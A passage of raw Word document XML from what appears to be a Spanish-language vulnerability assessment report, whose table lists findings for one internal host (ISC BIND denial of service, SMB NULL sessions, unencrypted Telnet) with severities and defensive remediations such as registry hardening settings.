              <w:t>Existe una vulnerabilidad de denegación de servicio (DoS) en ISC BIND versiones 9.11.18 / 9.11.18-S1 / 9.12.4-P2 / 9.13 /9.14.11 / 9.15 / 9.16.2 / 9.17 / 9.17.1 y anteriores. Un atacante remoto no autenticado puede explotar este problema,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>a través de un mensaje especialmente diseñado, para que el servicio deje de responder.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FE2775" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="053CA46D" w14:textId="54AE2F8F" w:rsidR="005F2B55" w:rsidRPr="00116FD9" w:rsidRDefault="00116FD9" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Actualice a la versión parcheada más estrechamente relacionada con su versión actual de BIND.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="17E8E4E2" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="243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0018E54C" w14:textId="74EAADFC" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00343B24"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Pr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56213CC6" w14:textId="278A7994" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00116FD9" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>ISC BIND Service Downgrade / Reflected DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="331BCFDA" w14:textId="77777777" w:rsidR="005F2B55"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Medio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54255030" w14:textId="6A326E48" w:rsidR="00116FD9" w:rsidRPr="00F26227" w:rsidRDefault="00116FD9" w:rsidP="00250C4A">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36822FA8" w14:textId="48C5BBB9" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00116FD9" w:rsidP="00116FD9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Según su versión </w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3" w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>auto informada</w:t>
            </w:r>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>, la instancia de ISC BIND 9 que se ejecuta en el servidor de nombres remoto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>se ve afectado por la degradación del rendimiento y las vulnerabilidades DoS reflejadas. Esto se debe a que BIND DNS no</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>limitando suficientemente el número de extracciones que se pueden realizar mientras se procesa una respuesta de referencia.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Un atacante remoto no autenticado puede explotar esto para degradar el servicio del servidor recursivo o</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>para usar el servidor afectado como reflector en un ataque de reflexión.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B6B214A" w14:textId="4EF28D79" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00116FD9" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Actualice a la versión de ISC BIND a la que se hace referencia en el aviso del proveedor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="7444FD15" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="264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5CA17323" w14:textId="1B945ED6" w:rsidR="005F2B55" w:rsidRPr="00035083" w:rsidRDefault="00343B24"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lastRenderedPageBreak/>
              <w:t>192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38CAF908" w14:textId="0894079A" w:rsidR="005F2B55" w:rsidRPr="00521942" w:rsidRDefault="00521942" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Microsoft Windows SMB NULL Session Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFBCFE6" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRDefault="00521942" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Alto </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC07049" w14:textId="6089F8FE" w:rsidR="00521942" w:rsidRPr="00F26227" w:rsidRDefault="00521942" w:rsidP="00250C4A">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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1515DA26" w14:textId="4CC8EEAC" w:rsidR="00521942" w:rsidRPr="00521942" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El host remoto ejecuta Microsoft Windows. Es posible iniciar sesión usando una sesión NULL (es decir, sin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>inicio de sesión o contraseña).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AA08C31" w14:textId="66DA559D" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Dependiendo de la configuración, es posible que un atacante remoto no autenticado aproveche</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>este problema para obtener información sobre el host remoto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="729DD466" w14:textId="250BF415" w:rsidR="00521942" w:rsidRPr="00521942" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Aplique los siguientes cambios de registro según los avisos de </w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3" w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>TechNet</w:t>
            </w:r>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> a los que se hace</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>referencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BEA4ADC" w14:textId="6D0555C1" w:rsidR="00521942" w:rsidRPr="00521942" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Establecer:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5646B2DC" w14:textId="1804D765" w:rsidR="00521942" w:rsidRPr="00521942" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71489310" w14:textId="71B49FAA" w:rsidR="00521942" w:rsidRPr="00521942" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\restrictnullsessaccess=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2F0E51" w14:textId="083EB14C" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00521942" w:rsidP="00521942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00521942">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Reinicie una vez que se hayan completado los cambios en el registro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="15D0AAE8" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="240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15AE0FA9" w14:textId="11ADEEA5" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00343B24"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Pr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="519B71C7" w14:textId="26710E63" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D975CC" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="_Hlk108699825"/>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Unencrypted Telnet Server</w:t>
            </w:r>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5368BFA6" w14:textId="2C3EDBE8" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D975CC" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="748D33C5" w14:textId="39179389" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D975CC" w:rsidP="00D975CC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El host remoto ejecuta un servidor Telnet a través de un canal no cifrado.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>No se recomienda usar Telnet en un canal sin cifrar, ya que los inicios de sesión, las contraseñas y los comandos son</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>transferido en texto claro. Esto permite que un atacante remoto intermediario espíe una sesión de Telnet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
